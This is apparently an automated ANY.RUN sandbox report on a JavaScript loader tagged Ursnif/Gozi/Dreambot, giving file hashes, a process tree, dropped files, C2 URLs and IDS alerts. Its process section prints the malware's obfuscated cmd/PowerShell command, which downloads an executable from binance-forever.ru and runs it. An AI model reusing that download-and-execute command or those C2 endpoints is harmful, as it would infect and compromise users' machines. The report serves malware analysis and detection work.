analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2765.js

Full analysis: https://app.any.run/tasks/19befd79-761f-403d-9b66-1c65a99557e4
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 21, 2019, 00:08:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
gozi
ursnif
evasion
dreambot
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with no line terminators
MD5:

6EBD75968C02FBD4F283A4E170C6C358

SHA1:

754B3F6FBA9C044D3964260649522D3E1497BA0C

SHA256:

4BB88AD92C9EBECFF56FAFCB3CD32A5234A54D6673B20BE254A81094AE6ACDD3

SSDEEP:

768:E4o0AxxBU3AshkoiBCoXFNifB5dmHKBJfgDHtaofPEVYwlspuHVX5S1ipASi8fwA:ELvBUT3H

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 1536)
    • Application was dropped or rewritten from another process

      • TempAwP51.exe (PID: 3896)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1216)
    • Downloads executable files with a strange extension

      • powershell.exe (PID: 1216)
    • Detected URSNIF Trojan

      • TempAwP51.exe (PID: 3896)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 2044)
    • Runs injected code in another process

      • TempAwP51.exe (PID: 3896)
    • Changes the autorun value in the registry

      • explorer.exe (PID: 2044)
    • Application was injected by another process

      • explorer.exe (PID: 2044)
    • Connects to CnC server

      • explorer.exe (PID: 2044)
  • SUSPICIOUS

    • Executes scripts

      • explorer.exe (PID: 2044)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1216)
    • Creates files in the user directory

      • powershell.exe (PID: 1216)
      • TempAwP51.exe (PID: 3896)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2688)
      • explorer.exe (PID: 2044)
    • Checks for external IP

      • nslookup.exe (PID: 3832)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
8
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start inject wscript.exe no specs cmd.exe no specs powershell.exe #URSNIF tempawp51.exe no specs #URSNIF explorer.exe cmd.exe no specs nslookup.exe cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2688"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\2765.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1536"C:\Windows\System32\cmd.exe" /c IesdUDvfmwYkVFi & p^owEr^she^lL.e^Xe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://www.binance-forever.ru/x.doc','%temp%AwP51.exe'); & start %temp%AwP51.exe & OuGqZfXytohlTpvC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1216powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://www.binance-forever.ru/x.doc','C:\Users\admin\AppData\Local\TempAwP51.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3896C:\Users\admin\AppData\Local\TempAwP51.exe C:\Users\admin\AppData\Local\TempAwP51.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2044C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
620cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\admin\AppData\Local\Temp\3B8E.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3832nslookup myip.opendns.com resolver1.opendns.com C:\Windows\system32\nslookup.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
nslookup
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2788cmd /C "echo -------- >> C:\Users\admin\AppData\Local\Temp\3B8E.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
342
Read events
260
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
3
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
1216powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5HVKGOEK0LBROZHBZVLR.temp
MD5:
SHA256:
3896TempAwP51.exeC:\Users\admin\AppData\Roaming\Microsoft\Devivmgr\crypptsp.exe
MD5:
SHA256:
620cmd.exeC:\Users\admin\AppData\Local\Temp\3B8E.bi1
MD5:
SHA256:
2788cmd.exeC:\Users\admin\AppData\Local\Temp\3B8E.bi1
MD5:
SHA256:
2044explorer.exeC:\Users\admin\AppData\Local\Temp\4287.bin
MD5:
SHA256:
1216powershell.exeC:\Users\admin\AppData\Local\TempAwP51.exeexecutable
MD5:048834770A431331181083CF933B53E3
SHA256:74843B188ABBD998B2F77C1CEC4444B551DFF65381016112454D8F764C05542C
1216powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1340d5.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
1216powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
2044explorer.exeC:\Users\admin\AppData\Local\Temp\5830.bincompressed
MD5:DC7BB46493B844B1A5695870863E6759
SHA256:03BFDCB9D5D4CF843C479B72F62722038B5933F35151B4676F811C1BF19B3645
2044explorer.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.jstext
MD5:EA951E8DDC3A84DC9A28CA777C788BC4
SHA256:2B2B0C33BB0B2EC46C902F23C5C4ACE0D4745E5F3776C159A5E8D631ECB0CB60
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
8
DNS requests
10
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2044
explorer.exe
GET
200
46.232.113.21:80
http://adonis-medicine.at/images/eZlOkGV3C/FTMg2CU7F0tZs8vve7pe/2MDrwZr_2FH4c4z7I2L/KlJvDBJQIjk0QVblohfbWV/uw5QBlfAkDht7/ijlfWgjJ/5Mo1hz7Npw1DleiXEfyMCYo/Jt2WFTq1Z0/AORSVMmIAUmo7DFGR/49GuPLRfy3_2/FtqnjzS3MIQ/v7Hhw5P1O8Ozs5/dvDlsSr1JEkOVwf70/n.gif
RU
malicious
1216
powershell.exe
GET
200
46.232.113.20:80
http://www.binance-forever.ru/x.doc
RU
executable
518 Kb
malicious
2044
explorer.exe
GET
200
37.48.122.26:80
http://curlmyip.net/
NL
text
14 b
shared
2044
explorer.exe
POST
200
46.232.113.21:80
http://adonis-medicine.at/images/4_2Bw6vTxUb/KyhHh17A6CniNC/X8GGdVnXC7_2Bjnf_2Fc1/ZKBfKb3U9XwyFWJI/2dwuMTS7ExITJPq/cSgEcvrhSMv9xZpsuj/3qC05txct/jyqTBaZZNfeO0Ad9xYrh/flT8w4cJzMFtPY_2FLS/QMNlA28g9Yq8r0xK1syKZK/aj9G1MxowGhfQ/ldZnu5L6/wvzYlUVzrWgH_2FGo6q1sWD/Vnaa_2B_2Fy/ODLPTK1v.bmp
RU
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3832
nslookup.exe
208.67.222.222:53
resolver1.opendns.com
OpenDNS, LLC
US
malicious
1216
powershell.exe
46.232.113.20:80
www.binance-forever.ru
MAROSNET Telecommunication Company LLC
RU
malicious
2044
explorer.exe
37.48.122.26:80
curlmyip.net
LeaseWeb Netherlands B.V.
NL
unknown
2044
explorer.exe
46.232.113.21:80
www.binance-forever.ru
MAROSNET Telecommunication Company LLC
RU
malicious

DNS requests

Domain
IP
Reputation
www.binance-forever.ru
  • 46.232.113.20
  • 46.232.113.21
  • 46.232.113.18
malicious
11totalzaelooop11.club
unknown
resolver1.opendns.com
  • 208.67.222.222
shared
222.222.67.208.in-addr.arpa
unknown
myip.opendns.com
shared
curlmyip.net
  • 37.48.122.26
shared
adonis-medicine.at
  • 46.232.113.21
  • 46.232.113.18
  • 46.232.113.20
malicious

Threats

PID
Process
Class
Message
1216
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1216
powershell.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
3832
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
3832
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
3832
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
3832
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (curlmyip .net in DNS lookup)
2044
explorer.exe
A Network Trojan was detected
ET TROJAN Ursnif Variant CnC Beacon
2044
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2044
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP
4 ETPRO signatures available at the full report
No debug info